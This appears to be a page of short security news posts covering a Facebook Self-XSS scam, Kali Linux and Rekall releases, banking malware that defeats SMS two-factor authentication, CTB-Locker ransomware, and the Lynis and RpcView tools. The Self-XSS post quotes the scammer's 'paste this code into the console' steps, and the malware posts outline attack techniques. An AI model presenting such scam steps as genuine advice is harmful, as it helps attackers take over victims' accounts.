More Self-XSS Scams Targeting Facebook Accounts

Social networks continue to be one of the resources that cyber criminal use to promote their attacks. Self-XSS is a new way used by hackers to compromise accounts on Facebook. the attack consist of malicious JavaScript or client-side that will be executed by the web browser and this will provide attacker access to victim account for fraud, spam and promoting further the attack by posting on timeline to friend list.

Attacker claiming on this case that they will provide a way to hack any Facebook user by following some simple steps but they are actually looking to run a Self XSS attack by urging user into pasting or injecting malicious code into their web browsers. the code will sign out the victim and ask the user to login one more time and here attacker will receive username and password for victim.

The posted scam looks as follows:

Hack any Facebook account following these steps:

1. Go to the victim’s profile
2. Click right click then click on inspect element and click the “Console” tab.
3. Paste the code into the box at the bottom and press Enter.

The code is in the web site: http://textuploader .com****/

Good luck: *

Don’t hurt anybody…

Self-XSS

To avoid Self-XSS social scam make sure to never copy past suspicious links from unknown sources to your browser, you can also report the post using the small triangle tab in the upper right hand side of each post, and then selecting “Report/Mark as spam” from the drop-down menu. If you want to check the URL try to use a virtual environment with sandbox that you can find over this poste: http://www.sectechno.com/2010/10/03/playing-around-malwares/

Share

New release Kali Linux 1.0.8

KaliNew release have been announced for Kali Linux a distribution that include more then 300 penetration testing tools. the new version is  Kali Linux 1.0.8 and allow user to have the full system embedded in a USB device. This will help to simplify the usage so you don’t need to install the system or use an ISO image but it is only required to boot from the USB or run a VM using the  USB EFI.

According to the release notes we have the following:

  1. Adding a new tools (Parsero, ghost-phisher, Nishang 0.3)
  2. Upgrade for tools ( SSLsplit,  Armitage, Recon-ng ,dnsrecon ,Responder, Automater)
  3. Bug fixes requested from previous releases.

If you have the distribution already installed you can run the update  using apt-get update && apt-get dist-upgrade. Some of the popular tools are Aircrack-ng for pentesting and cracking wireless network, Maltego for the intelligence and forensics , Metasploit can be used as an exploit framework , SAINT network vulnerability assessment scanner , Kismet wireless network sniffer,  Btcrack for Bluetooth Pass Phrase Bruteforce, Btscanner for the Bluetooth auditing , Nmap and much more.

You can read more about this release over here: http://www.kali.org/news/kali-1-0-8-released-uefi-boot-support/

Share

Rekall Memory Forensic Framework

Rekall Framework is an open source collection of tools that you can use for Forensics analyses. the program is based on Python and allow to have a full visibility for system state memory (RAM). Rekall runs on any platform that support Python and investigate the following images:

  • Microsoft Windows XP Service Pack 2 and 3
  • Microsoft Windows 7 Service Pack 0 and 1
  • Microsoft Windows 8 and 8.1
  • Linux Kernels 2.6.24 to 3.10.
  • OSX 10.6-10.9.x.

rekall screenshotRekall Framework screenshot

With Rekall you can have:

  • session information
  • list of processes
  • list of registers
  • sockets
  • hashed passwords stored in memory

There is also a possibility to use API which helps to run any search you need on the system memory. the installation is possible using pip manager by running (pip install rekall). you can have more information on the official website: http://www.rekall-forensic.com/

Share

Malware compromise online payment 2 factor authentication process

New malicious attack have been observed by TrendMicro and targeting Swiss bank customers, Attackers are able to use a sophisticated malware that intercept SMS tokens and change domain name configuration to redirect victims to non legitimate website. This to allow cyber criminal have a full control on victims bank account.

The attack start by infecting victim smartphones with the malicious application and redirect the victim to a phishing webserver to have users credential. The malicious app makes the following:

1- Modifies DNS server for redirection to a system controlled by hackers.

2- Installs a new SSL certificate of the root CA on the infected system. This allows attackers to view the content of phishing sites that are secured by SSL without the browser warning for the user. SSL encryption is primarily used with the https protocol transmission.

3- Remove the malicious application to not leave trace for the attack.

Normal-two-factor2 factor authentication process and how the compromise happen demo by TrendMicro

This makes attackers compromise the standard two factor authentication that many online financial service use to authenticate legitimate users. by looking at the malicious binaries investigated one of the C&C servers is located in Uzbekistan. while the attack is targeting users in Switzerland, Austria, and Sweden.

Share

Lynis v1.5.7- Security auditing and hardening tool

Hardening operating system is important to protect your environment against any compromise. one of the open source tools that you can use for hardening Unix and Linux based systems is Lynis. Lynis will run several hundreds of tests and perform an audit for your system so it will check the configuration files to find out if you have the correct configuration and report for what are the gaps you have on your systems.

Lynis help you with taking the right measures and check the related controls and define your improvement plan this to meet security standards such as Basel II,GLBA,HIPAA , ISO27001/ISO27002, PCI-DSS and SOx (Sarbanes-Oxley). Lynis will make the compliance scan you need to evaluate your system against the standards so you can have a checklist with the action plan to properly harden your system.

lynis-screenshotScreenshot for Lynis

At the moment there are an open source version that you can use for security auditing,vulnerability scanning and system hardening. While you can find an enterprise version which adds more components for the compliance check and security. you can download Lynis over this link: http://cisofy.com/products/

Share

CTB-Locker (Critroni) on the rise and using TOR

Attackers are implementing new strategies to exploit new vulnerabilities and increase their bot network.  Critroni is a new malicious program that have been sold in the underground forum. this kind of malware uses Tor network for the command and control servers to hide their presence and mask the source of attackers.

Critroni can be purchased for 3000 USD and provide attacker a platform to implement spam bot computers. the bot allows to install other malicious components and encrypt data similar to ransomware asking victim to pay online in order to have their files back. locking the computer is one of the method that becomes more often used by cybercriminal because it makes victim computer as a hostage and it will be almost impossible to decrypt the file without paying bitcoins to attackers.

ctb_startscreenshot after locking the files by Critroni

The problem with such infection that attackers provide the victim a 72 hours to have their files back and they perform the online payment otherwise files are going to be destroyed and user will lose all the data forever. the property for using tor makes it hard to track attacker because C&C server will be using an IP that are not for the cyber-criminals.

Here is more information about Critroni: http://malware.dontneedcoffee.com/2014/07/ctb-locker.html?view=classic

Share

RpcView – Tool to explore RPC functionality

RpcView is a free tool that can be used to monitor and decompile all registered interfaces on windows operating system. Information provided by this tool include the following:

  • the Pid of the process hosting this endpoint;
  • the used protocol among which the main ones are ncacn_ip_tcp, ncacn_np and ncalrpc;
  • the endpoint name depending of the underlying protocol:
    • port value for ncacn_ip_tcp or ncadg_ip_udp
    • pipe name prefixed by \pipe\ for ncacn_np
    • (A)LPC port name for ncalrpc

RpcViewRpcView interface to explore RPC processes

Usually there are registered RPC calls by name and the tool will help in listing them to identify legitimate once. on the other hand there are anonymous RPC processes and for those security researcher will need to dig deeper and investigate the DLL source for them using this tool.

At the moment there are both versions for 64-bit and 32-bit operating system and you can download RpcView over this link http://rpcview.org/

Share